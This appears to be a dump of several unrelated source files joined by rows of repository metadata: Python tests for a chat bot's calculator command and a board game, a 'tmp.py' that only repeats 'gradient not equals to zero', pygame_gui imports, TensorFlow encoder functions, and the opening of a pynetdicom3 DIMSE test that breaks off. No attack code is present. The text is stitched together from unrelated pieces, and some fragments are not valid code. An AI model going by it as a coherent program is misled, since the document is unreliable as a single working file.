assert -0.881 == float(data[0].text[:6]), "asinh(-1) != -0.881"
# Atanh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "atanh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(0.5)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.549 == float(data[0].text[:5]), "atanh(0.5) != 0.549"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(-0.5)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -0.549 == float(data[0].text[:6]), "atanh(-0.5) != -0.549"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "atanh(1) should fail"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atanh(2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "atanh(2) should fail"
def test_gamma(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc gamma(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "gamma(1) != 1"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc gamma(5)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 24 == float(data[0].text), "gamma(5) != 24"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc gamma(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text, "gamma(0) should fail"
def test_passive(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "25")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have happened."
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "23.47")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have happened."
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "2+2")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert data[0].text == "4", "2+2 = 4, hallo should have responded"
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "pie")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert 8.539 == float(data[0].text[:5]), "Response should have been received."
evt_msg = EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"cos(acos(sin(asin(tan(atan(acosh(cosh(sinh(asinh(tanh(atanh(0))))))))))))",
)
test_hallo.function_dispatcher.dispatch_passive(evt_msg)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert len(data) != 0, "Response should have been received."
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "acos(2)")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have been received"
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, " 97")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have been received"
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "9 7")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have been received"
def test_passive_ip_error(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch_passive(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "127.0.0.1")
)
data = test_hallo.test_server.get_send_data(0)
assert len(data) == 0, "No response should have happened."
def test_ee(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc ee")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text != "0", "Improper processing of constants."
assert data[0].text[:5] == "7.389", "Incorrect answer produced by e*e calculation."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc pipi")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text != "0", "Improper processing of constants."
assert (
data[0].text[:5] == "9.869"
), "Incorrect answer produced by pi*pi calculation."
def test_equals(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2+2=4")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "4=4" in data[0].text, "Answer was not correctly found."
assert "not right" not in data[0].text, "This calculation (2+2=4) is right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2+2=5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "4=5" in data[0].text, "Answer was not correctly calculated."
assert "not right" in data[0].text, "This calculation (2+2=5) is not right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc pi=acos(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "3.141" in data[0].text, "Pi should be in response."
assert "=3.141" in data[0].text, "Answer should be pi."
assert "not right" not in data[0].text, "This calculation (pi=acos(-1)) is right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc circle constant=pi")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "3.141" in data[0].text, "Pi should have been evaluated."
assert (
"circle constant=3.141" in data[0].text
), "Text should have been left unchanged."
assert "not right" not in data[0].text, "Numbers are not incorrect here."
assert "no calculation" not in data[0].text, "There is a calculation here."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc hello=goodbye")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "hello=goodbye" in data[0].text, "Text should not be changed."
assert "no calculation" in data[0].text, "There is no calculation here."
assert (
"not right" not in data[0].text
), "Should not say a user's non-calculation text is not right."
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc x=2+2=y=5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "x=4=y=5" in data[0].text, "Calculation should have been parsed and ran."
assert "no calculation" not in data[0].text, "There is a calculation here."
assert (
"not right" in data[0].text
), "Not all numbers here are the same, they are not equal."
| 50.500843 | 101 | 0.711557 | 4,463 | 29,947 | 4.497871 | 0.038763 | 0.220136 | 0.242851 | 0.176049 | 0.930059 | 0.911179 | 0.904503 | 0.899771 | 0.892299 | 0.891203 | 0 | 0.034261 | 0.154974 | 29,947 | 592 | 102 | 50.586149 | 0.75899 | 0.001069 | 0 | 0.416667 | 0 | 0.001852 | 0.12826 | 0.002441 | 0 | 0 | 0 | 0 | 0.198148 | 1 | 0.042593 | false | 0.02037 | 0.001852 | 0 | 0.044444 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
e07b9173fe09044ec19d2a4fbff66e5550b7c929 | 7,951 | py | Python | z2/part2/interactive/jm/random_normal_1/561870518.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part2/interactive/jm/random_normal_1/561870518.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part2/interactive/jm/random_normal_1/561870518.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 561870518
"""
"""
random actions, total chaos
"""
board = gamma_new(6, 8, 4, 15)
assert board is not None
assert gamma_move(board, 1, 0, 2) == 1
assert gamma_move(board, 1, 4, 2) == 1
assert gamma_move(board, 2, 3, 7) == 1
assert gamma_move(board, 2, 2, 7) == 1
assert gamma_busy_fields(board, 2) == 2
assert gamma_move(board, 3, 3, 4) == 1
assert gamma_free_fields(board, 3) == 43
board700952916 = gamma_board(board)
assert board700952916 is not None
assert board700952916 == ("..22..\n"
"......\n"
"......\n"
"...3..\n"
"......\n"
"1...1.\n"
"......\n"
"......\n")
del board700952916
board700952916 = None
assert gamma_move(board, 1, 0, 0) == 1
assert gamma_move(board, 2, 2, 4) == 1
assert gamma_free_fields(board, 2) == 41
assert gamma_move(board, 3, 1, 7) == 1
assert gamma_move(board, 3, 0, 5) == 1
assert gamma_move(board, 4, 3, 3) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 1, 5, 5) == 1
assert gamma_move(board, 1, 4, 3) == 1
assert gamma_move(board, 2, 4, 7) == 1
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 3, 2, 0) == 1
assert gamma_move(board, 4, 4, 4) == 1
assert gamma_move(board, 4, 1, 1) == 1
assert gamma_move(board, 1, 3, 5) == 0
assert gamma_free_fields(board, 1) == 31
assert gamma_move(board, 2, 5, 1) == 1
assert gamma_busy_fields(board, 3) == 5
assert gamma_move(board, 4, 4, 1) == 1
assert gamma_move(board, 1, 6, 2) == 0
assert gamma_busy_fields(board, 1) == 5
assert gamma_move(board, 2, 1, 3) == 1
assert gamma_move(board, 3, 3, 2) == 1
assert gamma_move(board, 3, 1, 5) == 1
assert gamma_move(board, 4, 3, 0) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 4, 1) == 0
assert gamma_move(board, 2, 1, 7) == 0
assert gamma_free_fields(board, 2) == 25
assert gamma_move(board, 3, 2, 2) == 1
assert gamma_move(board, 3, 2, 0) == 0
assert gamma_free_fields(board, 3) == 24
assert gamma_move(board, 4, 6, 1) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 1, 7, 0) == 0
assert gamma_move(board, 2, 6, 3) == 0
assert gamma_move(board, 3, 1, 0) == 1
assert gamma_move(board, 4, 6, 5) == 0
board137299271 = gamma_board(board)
assert board137299271 is not None
assert board137299271 == (".3222.\n"
"......\n"
"33.3.1\n"
"..234.\n"
".2.41.\n"
"1.331.\n"
".4..42\n"
"1334..\n")
del board137299271
board137299271 = None
assert gamma_move(board, 1, 2, 1) == 1
assert gamma_move(board, 1, 3, 5) == 0
assert gamma_move(board, 2, 0, 4) == 1
assert gamma_move(board, 2, 5, 4) == 1
assert gamma_busy_fields(board, 2) == 8
assert gamma_move(board, 3, 2, 5) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 4, 1, 2) == 1
assert gamma_move(board, 1, 5, 4) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 5) == 0
assert gamma_move(board, 2, 5, 6) == 1
assert gamma_move(board, 3, 1, 4) == 1
assert gamma_move(board, 3, 5, 7) == 1
assert gamma_move(board, 4, 4, 6) == 1
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_move(board, 1, 2, 2) == 0
assert gamma_move(board, 2, 2, 5) == 0
assert gamma_move(board, 2, 4, 4) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_golden_move(board, 2, 1, 1) == 1
assert gamma_move(board, 3, 7, 0) == 0
assert gamma_move(board, 3, 0, 7) == 1
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 1, 5, 5) == 0
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 2, 3) == 1
assert gamma_move(board, 1, 1, 7) == 0
assert gamma_move(board, 1, 1, 5) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_free_fields(board, 2) == 12
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 0, 6) == 1
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 2, 0, 4) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 4, 2, 5) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 1, 4, 5) == 1
assert gamma_move(board, 2, 1, 2) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 3, 2, 3) == 0
assert gamma_busy_fields(board, 3) == 13
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_busy_fields(board, 1) == 7
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_free_fields(board, 2) == 10
assert gamma_move(board, 3, 2, 0) == 0
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_busy_fields(board, 3) == 13
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 1, 2, 2) == 0
assert gamma_move(board, 1, 5, 4) == 0
assert gamma_move(board, 2, 2, 7) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 4, 7) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_busy_fields(board, 4) == 8
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_move(board, 2, 2, 7) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_busy_fields(board, 3) == 13
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 2, 4, 1) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_move(board, 4, 0, 3) == 1
assert gamma_golden_move(board, 4, 6, 5) == 0
assert gamma_move(board, 1, 1, 0) == 0
board301797101 = gamma_board(board)
assert board301797101 is not None
assert board301797101 == ("332223\n"
"4...42\n"
"333311\n"
"232342\n"
"42441.\n"
"14331.\n"
".21.42\n"
"1334..\n")
del board301797101
board301797101 = None
assert gamma_move(board, 2, 1, 3) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_free_fields(board, 3) == 9
assert gamma_move(board, 1, 4, 7) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_free_fields(board, 2) == 9
assert gamma_move(board, 3, 0, 1) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 1, 3, 5) == 0
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 3, 2) == 0
assert gamma_move(board, 3, 1, 7) == 0
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_move(board, 4, 2, 7) == 0
assert gamma_move(board, 1, 0, 0) == 0
assert gamma_move(board, 2, 4, 6) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 6, 2) == 0
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 4, 5) == 0
assert gamma_move(board, 1, 5, 0) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_busy_fields(board, 3) == 14
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 6, 3) == 0
assert gamma_busy_fields(board, 4) == 9
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 1, 1, 4) == 0
board493510436 = gamma_board(board)
assert board493510436 is not None
assert board493510436 == ("332223\n"
"4...42\n"
"333311\n"
"232342\n"
"42441.\n"
"14331.\n"
"321.42\n"
"1334.1\n")
del board493510436
board493510436 = None
assert gamma_move(board, 2, 6, 3) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_move(board, 4, 2, 5) == 0
gamma_delete(board)
| 32.321138 | 46 | 0.65627 | 1,454 | 7,951 | 3.435351 | 0.044704 | 0.361161 | 0.375375 | 0.500501 | 0.851852 | 0.846046 | 0.770771 | 0.535335 | 0.491692 | 0.491291 | 0 | 0.13772 | 0.178091 | 7,951 | 245 | 47 | 32.453061 | 0.626626 | 0 | 0 | 0.373333 | 0 | 0 | 0.032558 | 0 | 0 | 0 | 0 | 0 | 0.768889 | 1 | 0 | false | 0 | 0.004444 | 0 | 0.004444 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e0a13ab36a98100e7db59b7f8b316f4fec7158bf | 2,777 | py | Python | tmp.py | modanesh/integrated-gradient-pytorch | 73e7b1f0b42d69556aea56fc03811a044004329e | [
"MIT"
] | null | null | null | tmp.py | modanesh/integrated-gradient-pytorch | 73e7b1f0b42d69556aea56fc03811a044004329e | [
"MIT"
] | null | null | null | tmp.py | modanesh/integrated-gradient-pytorch | 73e7b1f0b42d69556aea56fc03811a044004329e | [
"MIT"
] | null | null | null | zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero
gradient not equals to zero | 27.77 | 27 | 0.82139 | 496 | 2,777 | 4.59879 | 0.010081 | 0.520824 | 0.65103 | 0.911442 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.17861 | 2,777 | 100 | 28 | 27.77 | 1 | 0 | 0 | 0.99 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
e0bab80818900cf095b2650c5eb2e77b56fffeca | 135 | py | Python | pygame_gui/__init__.py | halfninja/pygame_gui | 71b1150cb0c789339a9f8d781da15bdfad604f6c | [
"MIT"
] | null | null | null | pygame_gui/__init__.py | halfninja/pygame_gui | 71b1150cb0c789339a9f8d781da15bdfad604f6c | [
"MIT"
] | null | null | null | pygame_gui/__init__.py | halfninja/pygame_gui | 71b1150cb0c789339a9f8d781da15bdfad604f6c | [
"MIT"
] | null | null | null | from pygame_gui.ui_manager import UIManager
from pygame_gui import core
from pygame_gui import elements
from pygame_gui import windows
| 27 | 43 | 0.874074 | 22 | 135 | 5.136364 | 0.454545 | 0.353982 | 0.460177 | 0.504425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118519 | 135 | 4 | 44 | 33.75 | 0.94958 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
46110641613a51f4bd6181bb4ff623ee9f6ff767 | 1,495 | py | Python | avb/auxvae/models/full0.py | lim0606/AdversarialVariationalBayes | 93487ca64007c8381e1ed5fc3d131b5da751ba47 | [
"MIT"
] | 206 | 2017-05-13T12:59:57.000Z | 2022-03-30T08:42:41.000Z | avb/auxvae/models/full0.py | lim0606/AdversarialVariationalBayes | 93487ca64007c8381e1ed5fc3d131b5da751ba47 | [
"MIT"
] | 7 | 2017-05-13T12:59:46.000Z | 2020-01-28T12:41:13.000Z | avb/auxvae/models/full0.py | lim0606/AdversarialVariationalBayes | 93487ca64007c8381e1ed5fc3d131b5da751ba47 | [
"MIT"
] | 58 | 2017-05-15T16:27:15.000Z | 2021-12-15T12:39:12.000Z | import tensorflow as tf
from tensorflow.contrib import slim as slim
from avb.ops import *
import math
def encoder(x, a, config, is_training=True):
z_dim = config['z_dim']
# Center x at 0
x = 2*x - 1
x = flatten_spatial(x)
net = tf.concat([x, a], axis=1)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
zmean = slim.fully_connected(net, z_dim, activation_fn=None)
log_zstd = slim.fully_connected(net, z_dim, activation_fn=None)
return zmean, log_zstd
def encoder_aux(x, config, is_training=True):
a_dim = config['a_dim']
# Center x at 0
x = 2*x - 1
net = flatten_spatial(x)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
amean = slim.fully_connected(net, a_dim, activation_fn=None)
log_astd = slim.fully_connected(net, a_dim, activation_fn=None)
return amean, log_astd
def decoder_aux(x, z, config, is_training=True):
a_dim = config['a_dim']
x = 2*x - 1
x = flatten_spatial(x)
net = tf.concat([x, z], axis=1)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus)
amean = slim.fully_connected(net, a_dim, activation_fn=None)
log_astd = slim.fully_connected(net, a_dim, activation_fn=None)
return amean, log_astd
| 27.181818 | 70 | 0.692977 | 244 | 1,495 | 4.040984 | 0.188525 | 0.109533 | 0.219067 | 0.255578 | 0.801217 | 0.792089 | 0.792089 | 0.792089 | 0.792089 | 0.612576 | 0 | 0.023121 | 0.189967 | 1,495 | 54 | 71 | 27.685185 | 0.791082 | 0.01806 | 0 | 0.575758 | 0 | 0 | 0.010239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.121212 | 0 | 0.30303 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1ca351f7a8b95b1a8b6adf3440bef416c803f7b0 | 30,943 | py | Python | pynetdicom3/tests/test_dimse_provider.py | sisobus/pynetdicom3 | c9d3d1b52f17a107566f31e63e0e4d0e8aaacbab | [
"MIT"
] | 2 | 2019-02-07T08:02:30.000Z | 2019-03-20T04:00:20.000Z | pynetdicom3/tests/test_dimse_provider.py | sisobus/pynetdicom3 | c9d3d1b52f17a107566f31e63e0e4d0e8aaacbab | [
"MIT"
] | null | null | null | pynetdicom3/tests/test_dimse_provider.py | sisobus/pynetdicom3 | c9d3d1b52f17a107566f31e63e0e4d0e8aaacbab | [
"MIT"
] | 1 | 2019-04-11T07:39:06.000Z | 2019-04-11T07:39:06.000Z | #!/usr/bin/env python
"""Test DIMSE service provider operations.
TODO: Add testing of maximum pdu length flow from assoc negotiation
"""
from io import BytesIO
import logging
import pytest
from pydicom.dataset import Dataset
from pynetdicom3.dimse import DIMSEServiceProvider
from pynetdicom3.dimse_messages import (
C_STORE_RQ, C_STORE_RSP, C_FIND_RQ, C_FIND_RSP, C_GET_RQ, C_GET_RSP,
C_MOVE_RQ, C_MOVE_RSP, C_ECHO_RQ,C_ECHO_RSP, C_CANCEL_RQ,
N_EVENT_REPORT_RQ, N_EVENT_REPORT_RSP, N_GET_RQ, N_GET_RSP, N_SET_RQ,
N_SET_RSP, N_ACTION_RQ, N_ACTION_RSP, N_CREATE_RQ, N_CREATE_RSP,
N_DELETE_RQ, N_DELETE_RSP
)
from pynetdicom3.dimse_primitives import (
C_STORE, C_ECHO, C_GET, C_MOVE, C_FIND, N_EVENT_REPORT, N_SET, N_GET,
N_ACTION, N_CREATE, N_DELETE, C_CANCEL
)
from pynetdicom3.dsutils import encode
from .encoded_dimse_msg import c_store_ds
from .encoded_dimse_n_msg import (
n_er_rq_ds, n_er_rsp_ds, n_get_rsp_ds, n_set_rq_ds, n_set_rsp_ds,
n_action_rq_ds, n_action_rsp_ds, n_create_rq_ds, n_create_rsp_ds
)
LOGGER = logging.getLogger('pynetdicom3')
LOGGER.setLevel(logging.CRITICAL)
class DummyDUL(object):
"""Dummy DUL class for testing DIMSE provider"""
@staticmethod
def is_alive(): return True
@staticmethod
def send_pdu(pdv):
"""Dummy Send method to test DIMSEServiceProvider.Send"""
pass
@staticmethod
def receive_pdu():
"""Dummy Receive method to test DIMSEServiceProvider.Receive"""
pass
@staticmethod
def peek_next_pdu():
return 0x01
REFERENCE_MSG = [
(C_ECHO(), ('C_ECHO_RQ', 'C_ECHO_RSP')),
(C_STORE(), ('C_STORE_RQ', 'C_STORE_RSP')),
(C_FIND(), ('C_FIND_RQ', 'C_FIND_RSP')),
(C_GET(), ('C_GET_RQ', 'C_GET_RSP')),
(C_MOVE(), ('C_MOVE_RQ', 'C_MOVE_RSP')),
(C_CANCEL(), (None, 'C_CANCEL_RQ')),
(N_EVENT_REPORT(), ('N_EVENT_REPORT_RQ', 'N_EVENT_REPORT_RSP')),
(N_GET(), ('N_GET_RQ', 'N_GET_RSP')),
(N_SET(), ('N_SET_RQ', 'N_SET_RSP')),
(N_ACTION(), ('N_ACTION_RQ', 'N_ACTION_RSP')),
(N_CREATE(), ('N_CREATE_RQ', 'N_CREATE_RSP')),
(N_DELETE(), ('N_DELETE_RQ', 'N_DELETE_RSP')),
]
class TestDIMSEProvider(object):
"""Test DIMSE service provider operations."""
def setup(self):
"""Set up"""
self.dimse = DIMSEServiceProvider(DummyDUL(), 1)
def test_receive_not_pdata(self):
"""Test we get back None if not a P_DATA"""
assert self.dimse.receive_msg(True) == (None, None)
@pytest.mark.parametrize("primitive, cls_name", REFERENCE_MSG)
def test_send_msg(self, primitive, cls_name):
"""Check sending DIMSE messages."""
# -RQ
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
def test_callback(msg):
"""Callback"""
assert msg.__class__.__name__ == cls_name[0]
self.dimse.on_send_dimse_message = test_callback
if cls_name[0]:
self.dimse.send_msg(primitive, 1)
